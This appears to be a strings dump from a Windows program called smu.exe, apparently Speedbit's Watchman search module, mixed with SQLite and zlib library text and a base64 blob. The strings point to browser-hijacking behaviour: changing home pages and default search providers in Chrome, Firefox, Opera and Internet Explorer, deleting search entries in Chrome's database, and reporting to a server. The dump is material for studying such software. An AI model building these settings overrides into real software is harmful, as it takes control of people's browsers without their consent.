Could not find URL Set in configuration. Probably older configuration.

WatchmanKey::System::LoadSystemConfig

WatchmanKey::System::SaveSystemConfig

[Config::User::Chrome::Settings::Copy]

[Config::User::Firefox::Settings::Copy]

Config::User::Parser::ParseChromeSettings

Config::User::Parser::ParseFirefoxSettings

[Config::User::Parser::ParseChromeSettings]

[Config::User::Parser::ParseFirefoxSettings]

[Config::User::Builder::BuildChromeSettings]

[Config::User::Builder::BuildFirefoxSettings]

WatchmanKey::User::LoadConfiguration

WatchmanKey::User::SaveConfiguration

CChromeExtension::GetFileListInExtenstion

GCHROME.EXE

__MSG_

manifest.json

messages.json

WebData

[Chrome::BrowserInfo::Query]

Google\Chrome

\Application\chrome.exe

\Google\Chrome\Application\chrome.exe

\resources.pak

\Google\Chrome\Application\

\Web Data

[Chrome::BrowserSettings::OpenConfigFiles]

Chrome::InstallInfo::Get

SQLite::WebDataDB::Create

[Chrome::BrowserSettings::SetHomePagePreferences]

Argument.HomePageUrl:

Argument.HomePageIsNewTabPage:

[Chrome::BrowserSettings::SetDefaultProviderPreferences]

Argument.DefaultProviderId:

Argument.DefaultProviderKeyWord:

Argument.DefaultProviderName:

Argument.DefaultProviderEncoding:

Argument.DefaultProviderSearchUrl:

Argument.DefaultProviderIconUrl:

Argument.DefaultProviderSuggestUrl:

[Chrome::BrowserSettings::SetRestoreOnStartupPreferences]

Argument.RestoreOnStartup:

Argument.UrlsToRestoreOnStartup:

[Chrome::BrowserSettings::GetSearchProviderId]

Argument.KeywordToSearch:

SQLite::WebDataDB::GetFirstProviderId

SQLite::WebDataDB::GetProviderById

Result.ProviderId:

[Chrome::BrowserSettings::EnsureSearchProvider]

SQLite::WebDataDB::Values::Create

[Chrome::BrowserSettings::DeleteSearchProvider]

Key deleted:

[Chrome::BrowserSettings::MakeSnapshot]

[Chrome::BrowserSettings::RestoreState]

Chrome::BrowserSettings::OpenConfigFiles

Chrome::BrowserSettings::DeleteSearchProvider

SQLite::WebDataDB::SetDefaultProvider

[Chrome::BrowserSettings::PropagateState]

Chrome::BrowserSettings::EnsureSearchProvider

[SQLite::Implementation::AddProvider]

[SQLite::Implementation::GetProviderById]

[SQLite::Implementation::GetProviderByKeyword]

[SQLite::Implementation::GetFirstProviderId]

[SQLite::Implementation::GetProviderId]

Lchrome-extension://

13050095043000000

4BB42133-5533-4A0C-BF72-F1B8C8776A11

Checking<extensions.settings>

Opera Software\Opera Stable\

\Opera\launcher.exe

\opera.pak

\Opera\

Web Data

\resources\default_partner_content.json

[Firefox::BrowserSettings::MakeSnapshot]

[Firefox::BrowserSettings::RestoreState]

[Firefox::BrowserSettings::PropagateState]

Software\Microsoft\Internet Explorer\URLSearchHooks

[Explorer::BrowserSettings::SetMainKeyValues]

[Explorer::BrowserSettings::SetTabbedBrowsingKeyValues]

[Explorer::BrowserSettings::SetSearchScopeKeyValues]

[Explorer::BrowserSettings::SetAboutURLsKeyValues]

Argument.SearchScopeToSearch:

Result.SearchScope:

[Explorer::BrowserSettings::DeleteKey]

Argument.Parent:

Argument.Subkey:

VirtualSpeedbitSearchScopeKey::EnsureKeyW

SuggestionsURLFallback

SuggestionsURL

FaviconURLFallback

TopResultURL

KERNELBASE.DLL

smu.exe_1036:

.text

`.rdata

@.data

.rsrc

@.reloc

FTPj

E@PSSh

 1 23 456

Jx.SHx

.TxK%Yx

208.69.150.250

208.69.150.252

8.8.8.8

SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\

Catcher.ProcessId:

Catcher.Path:

Watcher.Filter:

2.1.9.476

smu.exe

Chrome

Report.xml

/Url:

unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll

3.7.2

SQLite format 3

CREATE TABLE sqlite_master(

sql text

CREATE TEMP TABLE sqlite_temp_master(

REINDEXEDESCAPEACHECKEYBEFOREIGNOREGEXPLAINSTEADDATABASELECTABLEFTHENDEFERRABLELSEXCEPTRANSACTIONATURALTERAISEXCLUSIVEXISTSAVEPOINTERSECTRIGGEREFERENCESCONSTRAINTOFFSETEMPORARYUNIQUERYATTACHAVINGROUPDATEBEGINNERELEASEBETWEENOTNULLIKECASCADELETECASECOLLATECREATECURRENT_DATEDETACHIMMEDIATEJOINSERTMATCHPLANALYZEPRAGMABORTVALUESVIRTUALIMITWHENWHERENAMEAFTEREPLACEANDEFAULTAUTOINCREMENTCASTCOLUMNCOMMITCONFLICTCROSSCURRENT_TIMESTAMPRIMARYDEFERREDISTINCTDROPFAILFROMFULLGLOBYIFISNULLORDERESTRICTOUTERIGHTROLLBACKROWUNIONUSINGVACUUMVIEWINITIALLYo

inflate 1.2.3 Copyright 1995-2005 Mark Adler

deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly

1.2.3

?456789:;<=

!"#$%&'()* ,-./0123

Report factory:

Update.xml

URLSet

Report

homeURL

suggestURL

newTabURL

ieSearchURL

chSearchURL

ffSearchURL

opSearchURL

chromeKeyword

[UpdateParser::Implementation::UpdateParser::ParseUrlSetSection]

vup.tmp

Argument.CheckResult:

Argument.IsRunning:

Delivery of report succeeded. TaskId:

Delivery of report failed.

&#xX;

</%s>

%s="%s"

%s='%s'

<!--%s-->

<![CDATA[%s]]>

version="%s"

encoding="%s"

standalone="%s"

SHDeleteKeyW

RegDeleteKeyExA

RegDeleteKeyExW

NtQueryKey

1.3.6.1.4.1.311.2.1.12

Snapshot.xml

GoogleChrome

MozillaFirefox

AboutTabsUrl

HomePageUrl

DefaultProviderKeyword

UrlsToRestoreOnStartup

StartupHomepageUrl

Chrome propagate flags:

Firefox propagate flags:

ParentKey:

GvrV5 fIBwR5G1CQDyLsic/pOLfRYKAGRyMxV8NxzSLudH5dYJ7ItKYE7rC1AC99X2kzxEChSNvkXetV0jCmjqUjmvO10UOWty3ApOQucR/hia9cu3H02a 5R CG5qhR8Y/uzTzzCr4GfPZ8D8t88yUqyCjdTSd8VRzWUuml0XIRmAC3mIaIBnS0qtpU54eeMa P511PX57TteCBWpQr UysHS8QouOBFyhBBaanipF1PUZ8zItL9IeCtaFExJDKcxi7FU7dmU7ctk7EMZZR3AC3j7jgcRnxrBRdeCW5PDYDKjcHmxPGAZm ePsRg6dCH9XvAsXiSqWsGTuCaJydkQ6BC6sdjbBYCQUNu0nP10JlSn5NzpucbmEgVB1WLSsSDe9vYbtKTOOJRR/CGu7qSqmZ1YxAdjnPMshzg FPfycjHdyERU/SZHvERWXU9WjRnocOXQbT0XOzcBQYfdCa3hiBDgamllsamooTTof6lK6Zb2EYpLiqRQU8WOQCSQu3D2YDP5v9J1Ah7R5gFH4pWrujpklOckba/Bhit29bHcRVAi6mCX5DamNCUq4tY5YMLWVOyVlPLgnZ2 AoHHhCVzsJqNqYZAEseYuauz5gxxhiozc82QCxEJsH2wDGV4Fnf8fmimJyQybsVBebTkkGhRnXfu0YEB4r2oBX3lttd09zG gE2dSUZsHBBBRwvxpM1HoEdvDeLKIaszMpTdRi5i9Rjlxfi9Gpe0mMgvRgepguez9/DfrgUpCVpjnmdNa5TuEirTy3 3mUWdojeY6y8tNBJLsyaj2cmjca3wiE/pLENTnow dbju2fmW9Odso8GLznFwJ6v7o aa2XPOVqX1qryZzbVRaYkdUtOZwrz3FBq1reAfrk12qBENZPPGH8qFcC1Xta09MnkMdxGwD1VeVH6y1RoVkpTPp8mumzKWoXv9DMFPLowiUNgpG22Ss2Vl3szBKCiwYupVQT1GMO/8/psE5WgwQjj9GkHyf3qsI7DSk3d1tp6LFKIdpFPw1fKx72Xwkee0n1T14ksSGewLuCI5WBuOqSexXFXKxmwFhXlCqivfRWSmIJP3ILQrfZbdILbXlwYfOJaoFIMMzCvlMq1hNa/26crmnuBXd8PAHYi5oF Ezzi28v/GmzOTan5Inj1p29ta/WyOajmdLkVPj/Ff/85EnaiNPV62/inI0Y G cikLBu94xgMNywTIn0iSo0A2A5zcNR0/W3DEqGCgbVHqqqN7oxy08Qx5h2gnrOB oSz4TfhJ72enIju7sYLTxMA7kHQzi1uY89QwqJ0lVbA0qUWOVGk3mHyuDH6s6ZsaVE21RT7iGvRc QmQG7X0EwDW3iK5YkiyDUwVzhYEGWfcbv2oR3qOQQDzTqwWYUeFmo0zKzQ86B08jN52EcuOE/ZCkLYCStfmrxhGiipXWbEWtFa973DaRy3KrobC50pz6S4AQ Xu9RlrutYMXGmRg/8hI08I4xW5uWRoMqVCLBcPq478k/Ez1Iuvw3JZBa5n3BHwmUosLcnRRpHWRptiZlKMNviUquLgwrIMhacWmDWX6DGjZz72knZzg3qzYwKatnnRjfEtXRrxXq5dKWE8P/XvlVCstT/qYqNm964Oc46C0p/j6M59qVRvkUnAZuZKVVXVc04fSy4FjvJzrD5LfXxpYA7lBFQ60fZYVir 54eC83A5L9BfivvGlwewWfWS5racrcSmF5nYMxn3f8EjwkuZK91BRZlAPdRAg1gfb2ohlntdntu/8x6g1Fph870zNk13u7LFWihV1csZZqZaKcf8uHi wLKouWpmT1vhCNR07YaH6glQvRnt556rVJvZWmKsVI D11NhFxQLUCKde TCvcZ9s8s2wVPTRW5ahtdYOUnZTFvHHm6WxjtFCc nNYa9LXYdoHnqQQbbKdnkYE3sY0r1cUZAZcLNGx7JjJlAz wLhxfvJ5Se6MsCoFx4tMQppa5N4IrcPL90Nqa0IehVmEvHvCsO96nwiOiJpFF5Rng8RAqrvnP7fJBgG grlD9sfim7R2LOvb8LIeDb/HkDwIOy0Ypq2WpWoj2sTSzv4LQeLmJnKqL8dPxNApEeCe/on90DLRH/7K2BOfAj4xNnkG8Wurgv8Aq205ha0rLU9c3fMu9qrSi/Lbh E5HwYMA/tzBwF6ZXR99yS0gt mz6yNCN8w9wK3 0cO6uoanOjzCCxkuXpkyIU5hIi4/aW0TS2NlDFlvgPs37FyXA3rM0rHHeEds6 N2YImzYWB45i3GqILHKLBnTYfsLAUMKSLqWFcSqlD2EAOJbgUN2dhhIZd8JSqHyltvUyR8fGRbT8H1C6lFlFw6TCxTjkY7hSGOB6CqzEs33tkr55PJUiBsU lrpTQX7T29psodMnih9sC97Wb6zIFJyIfIoxaxbcC411rqyJV WlRazWlP9dmcgd2KEqEuh HIGycoc6a74vp4I1eVo4j1DXtAbXnHEj/Nzk4NsFusbI9x9r8yoJGsAjKACoQqPoqgY6Nh6OgOPbqO0KcFE6RykrPzFDk087OfMz9xiaFrZcW9VdEoOGStbeIbQ61UbyXpHDkUpxIwy4WM6Q9jKdPcTJ3aBz3FCcdefxnGRHHeQ/TqrwU4zZ7WYikjCOoz6MLXTYdCCnrllA//dUk4rwM1HWaGHEMhUdSy8hKAd5bLH9JrVLB06axRgBYkgEfMAtdk/nTZwNFANA3xxxsjmlKtAzYNMpGhR5Jt2gs wEJKr3LF4mYqDxTmRdmxZzTSVlyupVv4c9WZc 5yFM63XebcscL6A4Vnd3tBpJCwY7BQj/INn 6L4DYFeEPAk3u56A6Idj9m5n3G8ElGy2ioOO5NLlT2BbQaf ydP 9doEgUl5I8vsvV3drtRmh8NlZTBnor4rhMg/5817TDiQOHVX/6ICKz8QAQ1qXh7rzHRgxv7l4hHdXC4BGHwimaD0vYdupfNiXOzJcR9Zi2FrL85kXZm/pKyAcUuT4mzwjvKHO8APVYBS3WPir7VT2GFuHIUk1jJdNzKYgPjW22pzqdWXzPCSwjqDtq1qci7tqa/iOikTtCsTOpe AtNDxBDyzbGRaGFRyDRmXf33o2wcd//5IkfU7zQDa8WdYYUqsJynEUW42wWLV2nfjyqvreKblZDfYXn7THCHpV FJqIA6QA3pVD/Iu4KCRWdwZhmGMf5115QF0A6wrHoiZr/C/c/ZzCzFd9AGd0/X/RXx5kAb/zSif FfHcxHpQ1pq956dBZ1KjZrY9PyxZF/uA8rHRCmaSGD4KhAwxA/T36fiLBJIvl YXdITmqH9g nng7f45Zi7UUvzZxHqetki8rZ VsWB0xM9f7cSEmyvDEqfhNKYT P/d8P9NRwv9pUx8RxruqBWYeyfeSKjB j97YTQCVG7lhvWt9SPacgGMHYQuR8YiGg3n/fKOacQ7XY7aXdMHYubFWgoTODW1TvMnTvo9KyKdcPRIZQLlODCSK2cA1/R AIojRwIFEU3gXLsC9CzL9TEeGdDnmnpTjRR/oc4fnDwiFdwh1sts7dbUU/MKxC0vIxSqTJ Bm5RJuCOUcCIOEALJ suBTJvj4EmrcgctR6ryJKkGlDzGLrLWgyK0pY776i MXQ6AA3wbM3ZQi75onR2vwCjgg8UQv5DMcP6HUM17MXCEHdbIEUvhJAKDZ6LGKfkP96HQrEgqjjsj97SZh YcQTzaR0M7JY3K3RwE/Oqv8BkWJMrOL1Mnhg vKtsNcwhtpUsBwrBgu3JrXbI/x0dho12ZuysjpUNiI7l8TVGCz00XXU0TNrucXvRe0z35rEpiTe9S/xdMqSDXmdGPz0VAHnfSf7GAckWfA3cfc6 fK3empP1a92e LLSpLJ eMrocYgVIvvo3sTpDaXWjQTa02srQEfZ9IFEOoEy3hYk1SzsXYanCd2UpHfsIHUn7A6Q5RL6kWAZXZjwXvcyDAd/iE/QmFFsENOkaEHNg5OVQeNkq6yEZdfdzPkkTSoD4ztUHEJpeNg66Z9bb085oS J3S42RvycdQGnk5Oi5IEzP24pIdF j3sKq17UXVbyMFHV8lOjWSlh1Y0Kq937bvGCBsnRwVwsXGaLrE0r4tLCj m5AR2mFP4JZKENROWGtv3BprlrMyW6uvd5XSKuyvDiHUpXC6X9vrBPdjhmY u1Ix3RLWWPyTlPNW9REKmk L6jtTqOdXQBBY6llXsDP GxJn/t1uTRSFktjf19T8K50owKGTnlhpUoqBt9WVKYR6YyGit8Mk9OX/kVR75EdE/t/VVSU/iQ4d3nFk75apgn3VoMIbDYB0MU7nPdwWV4Bw3vs2RpHTpOtd1ALNwE2rqG4GkKoTSlO7r7pf/7JUPLCEJ3MTmW ertKdGAF44MJoB5oJUC7cRpKE1GGYau4eKBe29fIMqabrVr6QSkkptljw8q6a9b0s51CNzKlcCEcnJ7cb8LzsVCoGFhsnLlYPtWEiZHnck3lMYWn 3dXBSbWlR5w4LH5uACO4/rhbVUD4ucX8Q3I xuwLg6D9pwjadqdcdeihP/dYMvbQkdRk/tNAX0NaFWMR/HAAIfPoqp/1rr1gRVssVKEiGD5sEAwe6oTJDXp53arWV3D/D5vn5IujBQ 2rnEYYUHXiy8l1JERR4rjNA7DT12jpOMT0jMd3iVIUBUj1mzjGZXIzrf1f/a31pbSCu 0xzo QvEihKjVfvV3OARI6o/U01YFNMB9PVBsYErGfiDd63JVmt3N8qLiFu9vjgbuR8v1Rqn6xhFt/268gxSnx6tR6RFkFakyk6xOIaoJqswSm7afKhThe55zMkJ1PXHaus/uKqhRKSx4PeLqR FvkdLVc1JiARy7RTdtBf4Bb2EFW11 XM3gU54DShNFXlldANcdZN6m/SO8vvJk2D45MvLWXyNVpppvdKfZ8gxSFna86neYQQ5MDbA2ybUl7PMmpMhipbx4u11sXUrkPb1krAEmlZe8b0NidLcTj9VOBgLD1OGyOnG 6iwNfShAh8UxAiZdQsOW7WkEAhvQWcu8F7zEZv1/RgOnyZj8h3NoufhlpqLWpBDf1Yn2TzN3mCKZZVtLWxoUGYN5hKFOHNw wFzSF/NcvveWIPceTitVXSx5V6KEMOmO9a8dbLLGj7wxi CD8aPNkL axxoWufJlAgNxC5vXoEVAtplK0CHRgJ/wFPHmREGEF7NKP9A1ATHTHzs97I04evT1dSc49oXK9XKbkx4nNsdwgeSdyWVKCABqAz9kVRVIom17pjwW8hc2JMJMhfEYUhDTenPgRu39cVRdPbHRBv9RULbqFimTLA6Ty1z2vN d RyOelC1Br/KCR1gs3 82Cpw9ANMYOUJSuSRxU/0yUKmboVum8icoM 1NpWi o wNKF/mtSGBg2O7QHI1qiCaEFr4JJ1dCTCibfvDUMgTIY4O6BS09dnfU66wIflATHfn3Vmz2O50icTeJCWKS1jbawYcRi18oLSBwmpPDXEo2PN7yZL9HUZF1QouUtVmHVEdUE4rQByTqa1MVsX86qDqtUnory9jONYV/vH7d4ez2KHSdPTt9xp3DAUH6A6dfyDIuV/9p42DDcXnW76lM3U/CsGM D9wFWiE46fRg5YU7GaujJWF04ZND7q gtbYPtbQ5 c5GicyYhXm7 JEE0t2 umb1A3XkLpWHPgOskn6nDRqT8pogSUQIwAhh71cUWkOGDMbcf JXOSMxXP9kIlF0Hl83ZsuwOnCxDcq7fa7o4mw/XZQgWJ7s4hA8s3/oev6/GtZX1KRw0qxgWbFSByNpU9rJc7akt9ZTVy19DUC2bVf/S7 mDmdLTLXknZuoeYWL /Yu/KMHimnmPc3VbRijG9yMq346J4Uzg qdOxn2P9sq2/IGUhNgRHnYhWUtJpyCaS7J8aQXHlRip23vRRFZdpWvqMNS9BWHDk1ISh5GUkediSGfX6oTEL2qol6OQQa4sXuy2Ei75O6Mdxd8rEdObV9Nr8FAW0IXJI93aPpDKjCx12PbNKFWnWXhtfxNKNQd9uTCY=

2, 1, 9, 476

Envelop.xml

Configuration.xml

UrlSet

Opera

StartPageUrl

AboutTabUrl

SearchScopeUrl

SearchScopeIconUrl

SearchScopeSuggestUrl

DefaultProviderSearchUrl

DefaultProviderIconUrl

DefaultProviderSuggestUrl

SearchPluginUrl

SearchPluginSuggestionUrl

TabPageUrl

SearchEngineFaviconUrl

SearchEngineSuggestionUrl

SearchEngineSearchUrl

SearchEngineKeyword

System.xml

Reset-2.1.0.7

UpdateUrl

ReportUrl

ReportDlls

User.xml

urls

SELECT * FROM urls

ERROR: %s

WebData path:

Argument.GeneralConfig:

Argument.Snapshot:

Argument.Flags:

suggest_url

originating_url

favicon_url

keyword

keyword LIKE '

keywords

WHERE key = 'Default Search Provider ID'

key = 'Default Search Provider ID'

DELETE from keywords WHERE id =

search_url

icon_url

startup_urls

urls_to_restore_on_startup

chrome_url_overrides

template_url_data

www-searching.com

image_url_post_params

instant_url

instant_url_post_params

new_tab_url

search_terms_replacement_key

search_url_post_params

suggestions_url

suggestions_url_post_params

chrome_settings_overrides

session.startup_urls

web_url

search_icon.png

select count(*) from sqlite_master where type = 'table' and name = '

%d-%m-%Y %H:%M, %a

large file support is disabled

SQL logic error or missing database

foreign_keys

sqlite_compileoption_get

sqlite_compileoption_used

sqlite_source_id

sqlite_version

sqlite_attach

sqlite_detach

sqlite_stat1

sqlite_rename_parent

sqlite_rename_trigger

sqlite_rename_table

RowKey

SQLITE_

d-d-d d:d:d

d:d:d

d-d-d

failed to allocate %u bytes of memory

failed memory resize %u to %u bytes

922337203685477580

API call with %s database connection pointer

%s-shm

%s\etilqs_

OsError 0x%x (%u)

Recovered %d frames from WAL file %s

invalid page number %d

2nd reference to page %d

Failed to read ptrmap key=%d

Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

failed to get page %d

freelist leaf count too big on page %d

Page %d:

unable to get the page. error code=%d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On page %d at right child:

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

keyinfo(%d

%s(%d)

%s-mjX

foreign key constraint failed

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

zeroblob(%d)

abort at %d in [%s]: %s

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

cannot change %s wal mode from within a transaction

database table is locked: %s

statement aborts at %d: [%s] %s

cannot open virtual table: %s

cannot open view: %s

no such column: "%s"

foreign key

indexed

cannot open %s column for writing

cannot open value of type %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s

%s: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

too many SQL variables

too many columns in %s

misuse of aggregate: %s()

%.*s"%w"%s

%s%.*s"%w"

%s OR name=%Q

there is already another table or index with this name: %s

sqlite_

table %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

SELECT idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

too many attached databases - max %d

database %s is already in use

unable to open database: %s

no such database: %s

cannot detach database %s

database %s is locked

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

there is already an index named %s

too many columns on %s

duplicate column name: %s

default value of column [%s] is not constant

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

indexed columns are not unique

table %s may not be indexed

views may not be indexed

virtual tables may not be indexed

there is already a table named %s

index %s already exists

sqlite_autoindex_%s_%d

table %s has no column named %s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

unable to identify the object to be reindexed

table %s may not be modified

cannot modify %s because it is a view

foreign key mismatch

table %S has %d columns but %d values were supplied

%d values for %d columns

table %S has no column named %s

%s.%s may not be NULL

PRIMARY KEY must be unique

sqlite3_extension_init

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

automatic extension loading failed: %s

foreign_key_list

*** in database %s ***

unsupported encoding: %s

malformed database schema (%s)

%s - %s

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

%s.%s

%s:%d

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

sqlite_subquery_%p_

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

-- TRIGGER %s

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor did not declare schema: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

at most %d tables in a join

cannot use index: %s

TABLE %s

%s AS %s

%s WITH AUTOMATIC INDEX

%s WITH INDEX %s

%s VIA MULTI-INDEX UNION

%s USING PRIMARY KEY

%s VIRTUAL TABLE INDEX %d:%s

%s ORDER BY

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unknown database: %s

no such vfs: %s

database corruption at line %d of [%.10s]

misuse at line %d of [%.10s]

cannot open file at line %d of [%.10s]

Argument.StartPage:

Argument.Autosearch:

Argument.NewTabPageShow:

Argument.SearchScopeId:

Argument.Tabs:

C:\BUILDS\Build_Watchman\Ver2\Speedbit.Watchman\Bin\SearchModulePlus_SearchModulePlus\Win32\WinMV\Release\smu.pdb

SHELL32.dll

SHLWAPI.dll

KERNEL32.dll

USER32.dll

RegOpenKeyExA

RegCloseKey

RegOpenKeyExW

ADVAPI32.dll

ole32.dll

OLEAUT32.dll

MSVCP90.dll

MSVCR90.dll

_amsg_exit

_crt_debugger_hook

WinHttpReceiveResponse

WinHttpSendRequest

WinHttpConnect

WinHttpCloseHandle

WinHttpQueryDataAvailable

WinHttpOpen

WinHttpOpenRequest

WinHttpReadData

WinHttpGetIEProxyConfigForCurrentUser

WINHTTP.dll

GetExtendedTcpTable

IPHLPAPI.DLL

WS2_32.dll

PSAPI.DLL

WTSAPI32.dll

Secur32.dll

CryptMsgClose

CertGetNameStringW

CertFreeCertificateContext

CertFindCertificateInStore

CertCloseStore

CryptMsgGetParam

CRYPT32.dll

USERENV.dll

CreatePipe

ConnectNamedPipe

CreateNamedPipeW

GetNamedPipeInfo

DisconnectNamedPipe

GetProcessHeap

RegCreateKeyW

RegCreateKeyExW

RegOpenKeyW

RegQueryInfoKeyW

RegDeleteKeyA

RegDeleteKeyW

RegEnumKeyExA

RegCreateKeyA

RegCreateKeyExA

RegQueryInfoKeyA

RegOpenKeyA

RegEnumKeyExW

RegEnumKeyW

.?AVImplementation@ReportBuilder@Monitor@SpeedBit@@

.?AVReportBuilder@Monitor@SpeedBit@@

.?AVHistoryReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVReportFactory@Implementation@ServerReporter@Monitor@SpeedBit@@

.?AVImplementation@ServerReporter@Monitor@SpeedBit@@

.?AVServerReporter@Monitor@SpeedBit@@

.?AVEventHandler@SendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVSendReportTask@Implementation@WatchmanMonitor@Monitor@SpeedBit@@

.?AVProfile@Implementation@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Implementation@0Firefox@SpeedBit@@

.?AVProfile@InstallInfo@Firefox@SpeedBit@@

.?AVInstallInfo@Firefox@SpeedBit@@

.?AVImplementation@PipedProcess@Utils@SpeedBit@@

.?AVPipedProcess@Utils@SpeedBit@@

.?AVImplementation@MachineKey@Utils@SpeedBit@@

.?AVMachineKey@Utils@SpeedBit@@

.?AVFirefoxSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVChromeSettings@Implementation@Snapshot@Injection@SpeedBit@@

.?AVSettings@Firefox@Snapshot@Injection@SpeedBit@@

.?AVSettings@Chrome@Snapshot@Injection@SpeedBit@@

.?AVUrlSet@Implementation@General@Config@SpeedBit@@

.?AVFirefoxValueSet@Implementation@General@Config@SpeedBit@@

.?AVChromeValueSet@Implementation@General@Config@SpeedBit@@

.?AVOperaSettings@Implementation@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@General@Config@SpeedBit@@

.?AVChromeSettings@Implementation@General@Config@SpeedBit@@

.?AVSettings@Opera@General@Config@SpeedBit@@

.?AVValueSet@Firefox@General@Config@SpeedBit@@

.?AVSettings@Firefox@General@Config@SpeedBit@@

.?AVValueSet@Chrome@General@Config@SpeedBit@@

.?AVSettings@Chrome@General@Config@SpeedBit@@

.?AVUrlSet@General@Config@SpeedBit@@

.?AVFirefoxSettings@Implementation@User@Config@SpeedBit@@

.?AVChromeSettings@Implementation@User@Config@SpeedBit@@

.?AVSettings@Firefox@User@Config@SpeedBit@@

.?AVSettings@Chrome@User@Config@SpeedBit@@

.?AVChromeBrowserHistory@SQLite@SpeedBit@@

.?AVException@sql@@

.?AVImplementation@Factory@BrowserInfo@Chrome@SpeedBit@@

.?AVFactory@BrowserInfo@Chrome@SpeedBit@@

.?AVImplementation@BrowserInfo@Chrome@SpeedBit@@

.?AVBrowserInfo@Chrome@SpeedBit@@

